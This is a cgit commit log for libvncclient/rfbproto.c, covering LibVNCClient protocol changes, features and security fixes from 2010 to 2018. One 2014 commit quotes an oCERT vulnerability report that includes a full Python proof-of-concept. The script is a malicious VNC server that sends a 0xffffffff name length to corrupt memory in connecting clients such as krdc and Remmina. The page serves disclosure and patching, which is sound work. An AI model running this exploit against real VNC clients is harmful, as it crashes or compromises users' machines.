summaryrefslogtreecommitdiffstats
path: root/libvncclient/rfbproto.c
Commit message (Collapse)AuthorAgeFilesLines
* LibVNCClient: ignore server-sent reason strings longer than 1MBChristian Beier2018-12-291-24/+21
| | | | Fixes #273
* LibVNCClient: ignore server-sent cut text longer than 1MBChristian Beier2018-12-291-0/+5
| | | | | This is in line with how LibVNCServer does it (28afb6c537dc82ba04d5f245b15ca7205c6dbb9c) and fixes part of #273.
* Merge pull request #263 from veyon/custom-auth-handlersChristian Beier2018-11-181-0/+29
|\ | | | | LibVNCClient: add support for custom auth handlers
| * LibVNCClient: add support for custom auth handlersTobias Junghans2018-11-111-0/+29
| | | | | | | | | | This allows to register custom authentication handlers in order to support additional security types.
* | Merge pull request #261 from veyon/misc-fixesChristian Beier2018-11-071-0/+1
|\ \ | | | | | | Misc fixes
| * | LibVNCClient: init pad field for set encodings msgTobias Junghans2018-11-061-0/+1
| |/
* / common: d3des: drop unused rfbCPKey()Tobias Junghans2018-11-071-1/+0
|/
* LibVNCClient: fix three possible heap buffer overflowsChristian Beier2018-09-291-4/+6
| | | | | | | An attacker could feed `0xffffffff`, causing a `malloc(0)` for the buffers which are subsequently written to. Closes #247
* LibVNCClient: fix possible infinite loopChristian Beier2018-09-291-1/+1
| | | | Closes #251
* LibVNCClient: don't leak uninitialised memory to remoteChristian Beier2018-09-291-0/+2
| | | | | | | The pad fields of the rfbClientCutTextMsg and rfbKeyEventMsg could contain arbitray memory belonging to the process, don't leak this to the remote. Closes #252
* When connecting to a repeater, only send initialised stringChristian Beier2018-09-291-2/+6
| | | | Closes #253
* Merge pull request #203 from dcommander/turbovnc-clientChristian Beier2018-01-231-13/+0
|\ | | | | Include Tight decoding optimizations from TurboVNC
| * Include Tight decoding optimizations from TurboVNCDRC2018-01-221-13/+0
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | - As with the encoder, the decoder now uses the TurboJPEG wrapper, which allows it to decode JPEG images directly into the framebuffer. This eliminates a buffer copy (CopyRectangle()) as well as the expensive RGB pixel conversion in DecompressJpegRectBPP(). The TurboJPEG wrapper performs RGB pixel conversion more optimally, and only when necessary (it uses the libjpeg-turbo colorspace extensions when available, in order to avoid RGB conversion.) - The other Tight subencoding types are also now decoded directly into the framebuffer, which eliminates buffer copies. - The Tight decoder now supports the rfbTightNoZlib extension, which allows the server to bypass zlib compression when Compression Level 0 is selected. The encoder already supports this extension. Passing the data stream through zlib when Compression Level 0 is selected needlessly wastes CPU time, since all zlib is doing is copying the data internally into its own structures.
* | Add trle decoderWiki Wang2017-09-151-0/+63
|/
* libvncclient: rename rfbsasl.[c|h] to sasl.[c|h] to be in line with naming ↵Christian Beier2017-09-021-1/+1
| | | | of other files
* Move HAVE_SASL #ifdefs into header file to have less LOCChristian Beier2017-09-021-3/+0
|
* Added SASL authentication supportsimon2017-06-251-0/+26
| | | | Added SASL support to OpenSSL
* Add function pointers for every type of rectangleBalazs Ludmany2016-06-291-103/+3
|
* Merge pull request #110 from AlexejStukov/patch-1Christian Beier2016-04-121-1/+2
|\ | | | | break statement out of case
| * break statement out of caseNorrec2016-04-071-1/+2
| |
* | Fix buffer overflow when applying client encodingszbierak2016-04-121-1/+2
|/
* Ignore null pointers in FillRectangle() and CopyRectangleFromRectangle()SpaceOne2016-01-271-0/+8
|
* Re-add the useful bits of 9aa9ac59b4cb10bfca93456a3098e348de172d7f.Christian Beier2015-04-171-0/+4
|
* Revert "LibVNCClient: Add H.264 encoding for framebuffer updates"Christian Beier2015-04-171-24/+0
| | | | | | | | This reverts commit d891478ec985660c03f95cffda0e6a1ad4ba350c. Conflicts: configure.ac libvncclient/h264.c
* Merge pull request #69 from nopdotcom/masterChristian Beier2015-04-171-1/+4
|\ | | | | Avoid divide-by-zero in raw encoding (OSX RealVNC)
| * Avoid divide-by-zero in raw encoding (OSX RealVNC)Jay Carlson2015-03-271-1/+4
| | | | | | | | | | | | | | | | | | OS X RealVNC server crashes out Remmina because the server can provoke bytesPerLine to be zero. Assume this is coding for zero lines. The condition could be checked before the calculation of bytesPerLine. I don’t understand the preconditions of this code to say one way or the other.
* | Initialize libgcrypt before useFloris Bos2015-01-021-0/+10
|/ | | | | | | | | | | | https://www.gnupg.org/documentation/manuals/gcrypt/Initializing-the-library.html "Before the library can be used, it must initialize itself. This is achieved by invoking the function gcry_check_version" Closes issue #45 Tested with krdc + libgcrypt 1.6.1 (libgcrypt20-dev Ubunutu package) connecting to a Mac Mini. Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* Fix possible libvncclient ServerInit memory corruption.Christian Beier2014-10-101-1/+2
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This fixes the following oCERT report (oCERT-2014-008 pt.2): There is a similar vulnerability to the previous one I sent. This is related to the ServerInit message where the width, the height of the server's framebuffer, its pixel format, and the name are sent to the client. The name can be used in a malicious manner to trigger a memory corruption in the client. Field Size --------------------------------- name-length [4] name-string [name-length] Below you will find a PoC script to show the vulnerability. This was tested on Fedora 20 with the latest version of krdc. I have noticed something, where the memory corruption causes the program to hang but allows you to try to disconnect. After this it hangs. Occasionally there will be segmentation fault in memcpy. This can become more reliable if you connect to a different VNC server first (Or the wrong port on the malicious server) then connecting to the malicious port. Every time I accidentally made the wrong VNC connection attempt the next time I connected it segfault'd. Just run the script it will listen on port 5900 and connect to it with krdc for example. I have observed Remmina crash more reliably. import socket,struct,sys HOST = "" PORT = 5900 c = socket.socket(socket.AF_INET, socket.SOCK_STREAM) c.bind((HOST,PORT)) c.listen(1) conn,addr = c.accept() print "Connected by ", addr protocolVersion3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" conn.send(protocolVersion3008) data = conn.recv(1024) # Receive the version from them. secTypeNone = "\x01\x01" secTypeAuth = "\x01\x02" conn.send(secTypeNone) data = conn.recv(1024) # Receive the secType choice from them. secResultOk = "\x00" * 4 secResultNo = "\x00\x00\x00\x01" conn.send(secResultOk) data = conn.recv(1024) # Receive the ClientInit (Shared-flag). frameBufferWidth = 0x0480 frameBufferHeight = 0x0360 bitsPerPixel = 0x20 depth = 0x18 bigEndian = 0x1 trueColor = 0x0 redM = 0x0 greenM = 0x0 blueM = 0x0 redS = 0x0 greenS = 0x0 blueS = 0x0 padding = "\x00\x00\x00" nameLength = 0xffffffff nameString = "AA" * 0xFFFF + "\x00\x0a" conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth, frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM, greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I", nameLength) + nameString ) c.close()
* `strings.h` and `resolv.h` are not available on MSVC, and some POSIX ↵Daniel Cohen Gindi2014-09-201-1/+6
| | | | | | functions are renamed or deprecated For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
* MSVC: Use _snprintf instead of snprintfDaniel Cohen Gindi2014-09-021-0/+4
| | | | | | | | | In Microsoft's Visual C runtime, the snprintf() function is actually called _snprintf. Let's just #define the former to call the latter. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix indentationJohannes Schindelin2014-08-161-2/+2
| | | | Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Check for MallocFrameBuffer() return valuenewsoft2014-08-151-3/+7
| | | | | | If MallocFrameBuffer() returns FALSE, frame buffer pointer is left to NULL. Subsequent writes into that buffer could lead to memory corruption, or even arbitrary code execution.
* Initialize padding in SetFormatAndEncodings' rfbSetPixelFormatMsg.Matthias Treydte2014-06-231-0/+2
|
* libvncclient: If we have TLS support, enable VeNCrypt by defaultJohannes Schindelin2014-04-051-0/+3
| | | | Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* LibVNCClient: Add H.264 encoding for framebuffer updatesDavid Verbeiren2013-01-251-0/+24
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This patch implements support in LibVNCClient for framebuffer updates encoded as H.264 frames. Hardware accelerated decoding is performed using VA API. This is experimental support to let the community explore the possibilities offered by the potential bandwidth and latency reductions that H.264 encoding allows. This may be particularly useful for use cases such as online gaming, hosted desktops, hosted set top boxes... This patch only provides the client side support and is meant to be used with corresponding server-side support, as provided by an upcoming patch for qemu ui/vnc module (to view the display of a virtual machine executing under QEMU). With this H.264-based encoding, if multiple framebuffer update messages are generated for a single server framebuffer modification, the H.264 frame data is sent only with the first update message. Subsequent update framebuffer messages will contain only the coordinates and size of the additional updated regions. Instructions/Requirements: * The patch should be applied on top of the previous patch I submitted with minor enhancements to the gtkvncviewer application: http://sourceforge.net/mailarchive/message.php?msg_id=30323804 * Currently only works with libva 1.0: use branch "v1.0-branch" for libva and intel-driver. Those can be built as follows: cd libva git checkout v1.0-branch ./autogen.sh make sudo make install cd .. git clone git://anongit.freedesktop.org/vaapi/intel-driver cd intel-driver git checkout v1.0-branch ./autogen.sh make sudo make install Signed-off-by: David Verbeiren <david.verbeiren@intel.com>
* Include strings.h for strncasecmp(3)Raphael Kubo da Costa2012-09-141-0/+1
|
* Tune the definitions needed when building with -ansi.Raphael Kubo da Costa2012-09-141-0/+1
| | | | | | | | | | | | | The current definitions were mostly useful to glibc and followed its feature_test_macros(3) documentation. However, this means other platforms still had problems when building with strict compilation flags. _BSD_SOURCE, for example, is only recognized by glibc, and other platforms sometimes need _XOPEN_SOURCE instead, or even the removal of some definitions (such as the outdate _POSIX_SOURCE one). _POSIX_SOURCE also had to be conditionally defined in some places, as what it enables or disables during compilation varies across systems.
* Fix some compiler warnings that hinted some no too unimportant errors.Christian Beier2012-05-091-2/+2
|
* LibVNCClient: #undef these types in case it's WIN32.Christian Beier2012-05-031-4/+4
| | | | | The various other headers include windows.h and the winsock headers which give an error when SOCKET and socklen_t are already defined.
* Added support for UltraVNC Single Click as originally proposed by Noobius ↵Monkey2012-04-231-0/+8
| | | | | | (Boobius) on 6/1/11. Original thread: http://sourceforge.net/tracker/?func=detail&aid=3310255&group_id=32584&atid=405860
* LibVNCClient: Remove all those WITH_CLIENT_TLS #ifdefs and move GnuTLS ↵Christian Beier2012-04-151-12/+1
| | | | specific functionality into tls_gnutls.c.
* When GetCredential() callback is not set, don't use authentications ↵Christian Beier2011-11-091-2/+2
| | | | | | | requiring it. The auth methods that employ Getcredential() will only be used if the client's GetCredential callback is actually set.
* Remove useless comparisons that always evaluate to false.Christian Beier2011-03-171-6/+1
| | | | | There can not be more than 255 security types and MSLogon is RFB 3.6 only.
* Fix (most) MinGW32 compiler warnings.Christian Beier2011-03-171-0/+2
|
* Let libvncclient build with gcrypt for MinGW32 builds.Christian Beier2011-03-121-0/+4
| | | | Signed-off-by: Christian Beier <dontmind@freeshell.org>
* Add ARD (Apple Remote Desktop) security type supportVic Lee2011-01-311-0/+216
| | | | | Signed-off-by: Vic Lee <llyzs@163.com> Signed-off-by: Christian Beier <dontmind@freeshell.org>
* Put files used by both libs into a 'common' dir.Christian Beier2011-01-251-2/+2
| | | | | | | | | No functional changes. All files used by _both_ libvncserver and libvncclient are put into a 'common' directory and references from other files as well as Autotools and CMake build systems are updated. Signed-off-by: Christian Beier <dontmind@freeshell.org>
* libvnc[server|client]: implement xvp VNC extension.Christian Beier2010-11-021-0/+52
| | | | | | | This implements the xvp VNC extension, which is described in the community version of the RFB protocol: http://tigervnc.sourceforge.net/cgi-bin/rfbproto It is also mentioned in the official RFB protocol.
* Only define strncasecmp to _strnicmp when using MS compiler.Christian Beier2010-10-211-5/+1
| | | | | | | Redefining strncasecmp to _strnicmp makes libvncclient hang forever in SetFormatAndEncodings() on Windows when built with MinGW64. Reported by Tobias Doerffel <tobias.doerffel@gmail.com>, thanks!
* IP QoS support in libvncclient.Christian Beier2010-09-291-0/+3
| | | | | | | | | | This enables setting the DSCP/Traffic Class field of IP/IPv6 packets sent by a client. For example starting a client with -qosdscp 184 marks all outgoing traffic for expedited forwarding. Implementation for Win32 is still a TODO, though. See http://betelco.blogspot.com/2009/03/dscp-marking-under-windows-at.html for an overview of the Win32 QoS API mess...
generated by cgit v1.2.3 (git 2.25.1) at 2024-05-28 11:20:44 +0000